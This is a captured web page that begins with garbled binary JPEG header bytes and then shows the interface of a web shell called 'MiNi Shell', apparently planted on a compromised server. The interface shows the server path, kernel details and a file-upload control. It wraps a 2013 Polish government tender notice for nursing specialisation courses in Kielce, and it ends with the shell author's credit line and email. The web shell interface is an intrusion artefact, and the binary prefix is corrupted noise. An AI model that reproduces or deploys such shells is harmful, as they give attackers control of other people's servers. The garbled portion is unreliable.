JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130822/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130822/167059-N-2013.html

<p class="kh_header"><b>Kielce: PRZEPROWADZENIE SZKOLEŃ SPECJALIZACYJNYCH I KURSÓW KWALIFIKACYJNYCH WRAZ Z ZAPEWNIENIEM MIEJSC ODBYWANIA SIĘ ZAJĘĆ TEORETYCZNYCH I PRAKTYCZNYCH</b><br>
<b>Numer ogłoszenia: 167059 - 2013; data zamieszczenia: 22.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Skarb Państwa - Świętokrzyski Urząd Wojewódzki w Kielcach , Aleja IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421534, faks 41 3421834.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kielce.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE SZKOLEŃ SPECJALIZACYJNYCH I KURSÓW KWALIFIKACYJNYCH WRAZ Z ZAPEWNIENIEM MIEJSC ODBYWANIA SIĘ ZAJĘĆ TEORETYCZNYCH I PRAKTYCZNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest organizacja oraz przeprowadzenie szkoleń specjalizacyjnych i kursów kwalifikacyjnych wraz z zapewnieniem miejsc odbywania się zajęć teoretycznych i praktycznych w dziedzinie pielęgniarstwa opieki długoterminowej, pielęgniarstwa psychiatrycznego i zachowawczego.
2. Zamówienie jest realizowane w ramach Projektu nr KIK/57 pn. Podniesienie jakości usług świadczonych w Jednostkach Organizacyjnych Pomocy Społecznej w celu wzmocnienia podmiotowości i aktywności życiowej podopiecznych realizowanego w ramach Szwajcarsko-Polskiego Programu Współpracy Priorytet 4 Rozwój społeczny i zasobów ludzkich, Obszar tematyczny: Ochrona zdrowia. 
3. Przedmiot zamówienia obejmuje realizację następujących zadań:
Zadanie   I - Szkolenie specjalizacyjne w dziedzinie pielęgniarstwa psychiatrycznego;
Zadanie  II - Szkolenie  specjalizacyjne w dziedzinie pielęgniarstwa opieki długoterminowej;
Zadanie III - Kurs kwalifikacyjny w dziedzinie pielęgniarstwa opieki długoterminowej;
Zadanie IV -  Kurs kwalifikacyjny w dziedzinie pielęgniarstwa psychiatrycznego;
Zadanie  V  - Kurs kwalifikacyjny w dziedzinie pielęgniarstwa zachowawczego.
Szczegółowy opis przedmiotu zamówienia stanowi załącznik Nr 1 do niniejszej specyfikacji.
4. Zamawiający zastrzega sobie, iż liczba osób biorących udział w szkoleniu/kursie może ulec zmniejszeniu. W takim wypadku Wykonawcy nie przysługuje żadne roszczenie z tytułu niewykonania  części umowy. Zamawiający nie jest w stanie określić stopnia, w jakim może nie dojść do wykonania zamówienia. Zamawiający działa w dobrej wierze, aby zrealizować zamówienie w całości.
5. Szkolenia specjalizacyjne oraz kursy kwalifikacyjne powinny być przygotowane zgodnie z programem opracowanym na podstawie art. 78 ustawy z dnia 15 lipca 2011 r. o zawodach pielęgniarki i położnej (Dz. U. z 2011r. Nr 174, poz. 1039 z pózn. zm.) zatwierdzonym (stan prawny aktualny na dzień składania ofert) przez ministra właściwego do spraw zdrowia.
6. Proponowane harmonogramy każdego szkolenia/kursu wraz z programem Wykonawca przekaże Zamawiającemu do akceptacji do 25 dni od daty podpisania umowy.
7. Zamawiający wymaga, aby Wykonawca prowadził dokumentację przebiegu kształcenia, zgodnie z przepisami prawa i wymogami Centrum Kształcenia Podyplomowego Pielęgniarek i Położnych (CKPPiP) dostępnymi na stronie www.ckppip.edu.pl .
8. Zamawiający wymaga, aby szkolenia specjalizacyjne były realizowane w trybie mieszanym (częściowo niestacjonarnym), natomiast kursy kwalifikacyjne - w trybie niestacjonarnym. Jeżeli program szkolenia/kursu przewiduje taką możliwość, realizacja części zajęć teoretycznych w ramach szkolenia/kursu może odbywać się w trybie samokształcenia uczestników. Wykonawca wskaże w formularzu cenowym stanowiącym załącznik do SIWZ liczbę dni zajęć teoretycznych, które zamierza zrealizować w trybie samokształcenia. Koszt zajęć teoretycznych realizowanych w ramach samokształcenia wliczony jest w cenę opracowania materiałów dydaktycznych.
9. Zamawiający wymaga, aby czas trwania zajęć teoretycznych wynosił nie więcej niż 9 godzin dydaktycznych w ciągu jednego dnia, a zajęcia były organizowane w blokach szkoleniowych, obejmujących sobotę i niedzielę oraz dodatkowo do 3 dni roboczych (dotyczy szkoleń specjalizacyjnych). Przez pojęcie godziny dydaktycznej Zamawiający rozumie 45 minut.
10. Zamawiający wymaga, aby grupa uczestników odbywających zajęcia praktyczne równocześnie w jednej placówce liczyła nie więcej niż 6 osób. Zajęcia praktyczne będą się odbywały na zasadach ustalonych przez Wykonawcę, mających swoje odzwierciedlenie w  harmonogramie szkolenia/kursu i zatwierdzonych przez Zamawiającego.
11. Zamawiający wymaga, aby Wykonawca na etapie realizacji zamówienia zapewnił, na potrzeby organizowanych w ramach szkoleń specjalizacyjnych i kursów kwalifikacyjnych zajęć teoretycznych, salę/e dydaktyczną/e na terenie miasta Kielc, dostępną/e przez czas trwania zajęć teoretycznych i spełniającą/-e wymogi Rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (tekst jednolity Dz. U. 2003 r., Nr 169, poz. 1650 ze zm.) oraz wskazane w Opisie przedmiotu zamówienia - załączniku nr 1 do SIWZ.
12. Zamawiający wymaga, aby Wykonawca na etapie realizacji zamówienia zapewnił odpowiedni potencjał organizacyjny, na potrzeby organizowanych w ramach szkoleń specjalizacyjnych i kursów kwalifikacyjnych zajęć praktycznych. Zajęcia praktyczne zostaną zorganizowane przez Wykonawcę w placówkach zlokalizowanych na terenie województwa świętokrzyskiego. Wykonawca w porozumieniu z Zamawiającym uzgodnią dogodne dla uczestników miejsce organizacji zajęć praktycznych.
13. Zamawiający wymaga, aby Wykonawca opracował i przekazał każdemu z uczestników kształcenia oraz Zamawiającemu komplet materiałów dydaktycznych w języku polskim, obejmujących tematykę szkolenia/kursu w formie papierowej i elektronicznej. Materiały powinny umożliwiać Wykonawcy właściwe prowadzenie zajęć i samokształcenie uczestników. Materiały te nie mogą naruszać praw osób trzecich.
14. Zamawiający wymaga, aby:
- przekazane materiały szkoleniowe zawierały wskazane przez Zamawiającego logotypy i oznaczenia oraz informacje o dofinansowaniu, w tym: logo Swiss Contribution, herb województwa świętokrzyskiego oraz logo wojewody świętokrzyskiego,
- strona tytułowa materiałów szkoleniowych była zgodna z wytycznymi przekazanymi przez Zamawiającego, w szczególności nie zawierała logo Wykonawcy lub informacji o Wykonawcy, 
- Wykonawca zamieszczał swoje logo/informacje o Wykonawcy wyłącznie na wewnętrznej lub ostatniej stronie materiałów szkoleniowych, 
- Wykonawca przekazał Zamawiającemu na potrzeby dokumentacji projektowej dwa egzemplarze materiałów w formie papierowej oraz jeden w formie elektronicznej. 
15.	Zamawiający wymaga, aby Wykonawca umożliwił przedstawicielom Zamawiającego przeprowadzanie wśród uczestników szkoleń/kursów ankiet dotyczących realizacji formy kształcenia stanowiącej przedmiot danego zadania zamówienia. Wykonawca zobowiązuje się nie przedstawiać uczestnikom, bez pisemnej zgody Zamawiającego lub jego przedstawiciela, własnych ankiet, list, itp.
16. Zamawiający zastrzega możliwość prowadzenia dokumentacji fotograficznej i filmowej realizowanych 
w ramach przedmiotu zamówienia zajęć teoretycznych. Wykonawca zobowiązany jest uzyskać zgodę na rozpowszechnianie wizerunku osób prowadzących zajęcia teoretyczne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.56.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony jeśli Wykonawca wykaże, że posiada: 
Zgodnie z art. 75 ustawy z dnia 15.07.2011 r. o zawodach pielęgniarki i położnej (Dz.U. z 2011 nr 174 poz. 1039), organizatorami kształcenia mogą być: uczelnie, szkoły prowadzące działalność dydaktyczną i badawczą w dziedzinie nauk medycznych oraz podmioty lecznicze, inne podmioty po uzyskaniu wpisu do właściwego rejestru podmiotów prowadzących kształcenie podyplomowe;
Opis sposobu dokonywania oceny spełniania tego warunku:
- ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust. 1 ustawy oraz dokumentu poświadczającego uprawnienie do organizowania kształcenia zgodnie z ustawą o zawodach pielęgniarki i położnej .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument poświadczający uprawnienie do organizowania kształcenia zgodnie z ustawą o zawodach pielęgniarki i położnej (w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem). Uprawnienia winny odnosić się do całego okresu trwania szkolenia/kursu. (stan prawny aktualny na dzień składania ofert).
2. Oświadczenie: Klauzula antykorupcyjna - Załącznik Nr 6 do SIWZ.
3. Pisemne zobowiązanie bądź inny właściwy dokument innych podmiotów, o których mowa w art. 26 ust. 2b ustawy, poświadczający oddanie do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania 
z nich przy wykonywaniu zamówienia, w przypadku, gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu będzie polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia itp. tych podmiotów - wg wzoru określonego w Załączniku nr 9 do SIWZ (jeżeli dotyczy).
Uwaga:
Zobowiązanie powinno zostać złożone w formie oryginału.
4. Dokumenty potwierdzające uprawnienia osób podpisujących ofertę Wykonawcy do działania w jego imieniu (w tym także pełnomocnictwa), o ile uprawnienia te nie wynikają z dokumentów rejestrowych. 
5. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie (w tym: konsorcja, spółki cywilne) w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia. 
Uwaga: 
Pełnomocnictwa powinny zostać złożone w formie oryginału albo w formie kserokopii notarialnie poświadczonej za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany postanowień niniejszej umowy w  następujących przypadkach: 
a) zmiany terminu realizacji i harmonogramu kursów/szkolenia;
b) zmiany dokumentacji kursów szkolenia, gdy konieczność jej dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia Umowy;
c) zmiany uczestników kursów/szkoleń;
d) zmiany stawki podatku VAT.
2. Zmiana umowy nastąpi na wniosek jednej ze stron w terminie 7 dni od powzięcia wiedzy o przyczynie zmiany. 
3. Nie stanowi istotnej zmiany umowy: 
a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego),
b) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami,
c) zmiany osób, o których mowa w § 10 umowy - z powodu ich choroby, śmierci, utraty wymaganych uprawnień, rozwiązania stosunku pracy lub decyzji osób przełożonych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kielce.uw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Urząd Wojewódzki w Kielcach, 
Biuro Administracyjno-Gospodarcze 
Aleja IX Wieków Kielc 3, 25-516 Kielce
Budynek A, pokój 337.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2013 godzina 12:30, miejsce: Świętokrzyski Urząd Wojewódzki w Kielcach, 
Biuro Administracyjno-Gospodarcze 
Aleja IX Wieków Kielc 3, 25-516 Kielce
Budynek A, pokój 337.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com